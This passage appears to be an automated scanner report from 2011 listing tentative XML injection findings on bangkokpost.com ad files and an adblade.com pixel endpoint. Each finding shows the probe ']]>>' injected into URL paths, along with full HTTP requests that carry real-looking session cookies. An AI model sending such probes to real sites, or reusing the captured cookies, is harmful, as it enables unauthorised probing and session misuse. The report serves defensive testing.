GET /ads/Poonphol]]>>/140611PoonPholOffice_728x90.swf?clicktag=http://ads2.bangkokpost.co.th/adclick/CID=00001db264e3f66300000000/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=728X90PIXELS/POSITION=CENTER/METHOD=JSCRIPT/ACC_RANDOM=820931449 HTTP/1.1
Host: media1.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.1.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _cbclose62518=1; _uid62518=2BAEE501.1; _ctout62518=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sun, 04 Sep 2011 02:34:44 GMT
Server: lighttpd/1.4.22

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.30. http://media1.bangkokpost.com/ads/Poonphol/140611PoonPholOffice_728x90.swf [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://media1.bangkokpost.com
Path:   /ads/Poonphol/140611PoonPholOffice_728x90.swf

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /ads/Poonphol/140611PoonPholOffice_728x90.swf]]>>?clicktag=http://ads2.bangkokpost.co.th/adclick/CID=00001db264e3f66300000000/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=728X90PIXELS/POSITION=CENTER/METHOD=JSCRIPT/ACC_RANDOM=820931449 HTTP/1.1
Host: media1.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.1.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _cbclose62518=1; _uid62518=2BAEE501.1; _ctout62518=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sun, 04 Sep 2011 02:34:56 GMT
Server: lighttpd/1.4.22

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.31. http://media1.bangkokpost.com/ads/house%20ads/030811Epaper_300x250_BP.swf [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://media1.bangkokpost.com
Path:   /ads/house%20ads/030811Epaper_300x250_BP.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /ads]]>>/house%20ads/030811Epaper_300x250_BP.swf?clicktag=http://ads2.bangkokpost.co.th/adclick/CID=00001e3b64e3f66300000000/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=300X250PIXELS/POSITION=RIGHT2/METHOD=JSCRIPT/ACC_RANDOM=34309588 HTTP/1.1
Host: media1.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.1.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _cbclose62518=1; _uid62518=2BAEE501.1; _ctout62518=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sun, 04 Sep 2011 02:41:30 GMT
Server: lighttpd/1.4.22

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.32. http://media1.bangkokpost.com/ads/house%20ads/030811Epaper_300x250_BP.swf [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://media1.bangkokpost.com
Path:   /ads/house%20ads/030811Epaper_300x250_BP.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /ads/house%20ads]]>>/030811Epaper_300x250_BP.swf?clicktag=http://ads2.bangkokpost.co.th/adclick/CID=00001e3b64e3f66300000000/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=300X250PIXELS/POSITION=RIGHT2/METHOD=JSCRIPT/ACC_RANDOM=34309588 HTTP/1.1
Host: media1.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.1.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _cbclose62518=1; _uid62518=2BAEE501.1; _ctout62518=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sun, 04 Sep 2011 02:41:43 GMT
Server: lighttpd/1.4.22

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.33. http://media1.bangkokpost.com/ads/house%20ads/030811Epaper_300x250_BP.swf [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://media1.bangkokpost.com
Path:   /ads/house%20ads/030811Epaper_300x250_BP.swf

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /ads/house%20ads/030811Epaper_300x250_BP.swf]]>>?clicktag=http://ads2.bangkokpost.co.th/adclick/CID=00001e3b64e3f66300000000/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=300X250PIXELS/POSITION=RIGHT2/METHOD=JSCRIPT/ACC_RANDOM=34309588 HTTP/1.1
Host: media1.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.1.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _cbclose62518=1; _uid62518=2BAEE501.1; _ctout62518=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sun, 04 Sep 2011 02:41:54 GMT
Server: lighttpd/1.4.22

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.34. http://media1.bangkokpost.com/ads/raimonland/220811RaimonLand185_300x250_BKP.swf [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://media1.bangkokpost.com
Path:   /ads/raimonland/220811RaimonLand185_300x250_BKP.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /ads]]>>/raimonland/220811RaimonLand185_300x250_BKP.swf?clicktag=http://ads2.bangkokpost.co.th/adclick/CID=00001e504a0bd40800000000/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT2/METHOD=JSCRIPT/ACC_RANDOM=60942710 HTTP/1.1
Host: media1.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; _cbclose62518=1; _uid62518=2BAEE501.1; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.2.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _ctout62518=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sun, 04 Sep 2011 03:26:41 GMT
Server: lighttpd/1.4.22

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.35. http://media1.bangkokpost.com/ads/raimonland/220811RaimonLand185_300x250_BKP.swf [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://media1.bangkokpost.com
Path:   /ads/raimonland/220811RaimonLand185_300x250_BKP.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /ads/raimonland]]>>/220811RaimonLand185_300x250_BKP.swf?clicktag=http://ads2.bangkokpost.co.th/adclick/CID=00001e504a0bd40800000000/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT2/METHOD=JSCRIPT/ACC_RANDOM=60942710 HTTP/1.1
Host: media1.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; _cbclose62518=1; _uid62518=2BAEE501.1; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.2.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _ctout62518=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sun, 04 Sep 2011 03:26:57 GMT
Server: lighttpd/1.4.22

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.36. http://media1.bangkokpost.com/ads/raimonland/220811RaimonLand185_300x250_BKP.swf [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://media1.bangkokpost.com
Path:   /ads/raimonland/220811RaimonLand185_300x250_BKP.swf

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /ads/raimonland/220811RaimonLand185_300x250_BKP.swf]]>>?clicktag=http://ads2.bangkokpost.co.th/adclick/CID=00001e504a0bd40800000000/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT2/METHOD=JSCRIPT/ACC_RANDOM=60942710 HTTP/1.1
Host: media1.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; _cbclose62518=1; _uid62518=2BAEE501.1; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.2.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _ctout62518=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sun, 04 Sep 2011 03:27:15 GMT
Server: lighttpd/1.4.22

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.37. http://media1.bangkokpost.com/ads/turkish_airlines/04052011TurKish_300x250.swf [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://media1.bangkokpost.com
Path:   /ads/turkish_airlines/04052011TurKish_300x250.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /ads]]>>/turkish_airlines/04052011TurKish_300x250.swf?clicktag=http://ads2.bangkokpost.co.th/adclick/CID=00001d454a0bd40800000000/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT1/METHOD=JSCRIPT/ACC_RANDOM=855445601 HTTP/1.1
Host: media1.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; _cbclose62518=1; _uid62518=2BAEE501.1; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.2.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _ctout62518=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sun, 04 Sep 2011 03:26:51 GMT
Server: lighttpd/1.4.22

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.38. http://media1.bangkokpost.com/ads/turkish_airlines/04052011TurKish_300x250.swf [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://media1.bangkokpost.com
Path:   /ads/turkish_airlines/04052011TurKish_300x250.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /ads/turkish_airlines]]>>/04052011TurKish_300x250.swf?clicktag=http://ads2.bangkokpost.co.th/adclick/CID=00001d454a0bd40800000000/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT1/METHOD=JSCRIPT/ACC_RANDOM=855445601 HTTP/1.1
Host: media1.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; _cbclose62518=1; _uid62518=2BAEE501.1; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.2.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _ctout62518=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sun, 04 Sep 2011 03:27:03 GMT
Server: lighttpd/1.4.22

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.39. http://media1.bangkokpost.com/ads/turkish_airlines/04052011TurKish_300x250.swf [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://media1.bangkokpost.com
Path:   /ads/turkish_airlines/04052011TurKish_300x250.swf

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /ads/turkish_airlines/04052011TurKish_300x250.swf]]>>?clicktag=http://ads2.bangkokpost.co.th/adclick/CID=00001d454a0bd40800000000/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT1/METHOD=JSCRIPT/ACC_RANDOM=855445601 HTTP/1.1
Host: media1.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; _cbclose62518=1; _uid62518=2BAEE501.1; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.2.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _ctout62518=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sun, 04 Sep 2011 03:27:14 GMT
Server: lighttpd/1.4.22

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.40. http://pixel.adblade.com/imps.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://pixel.adblade.com
Path:   /imps.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /imps.php]]>>?sgms=193 HTTP/1.1
Host: pixel.adblade.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: __sgs=Rkolm3H%2BdppOL6or2ytWhDZQNOeacHCu83vup2uIZ6Qwqy05SeMbjt01BACbO1t0xR6RxCZpl5RAOKhmEmgi8g%3D%3D; __esgs=UYx2FlkZNhD43QIFMYf0HRvSn3KklYp8Vni99f2%2BJtY%3D

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 04 Sep 2011 04:00:26 GMT
Server: lighttpd/1.4.21

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.41. http://pixel.adblade.com/log.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://pixel.adblade.com
Path:   /log.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

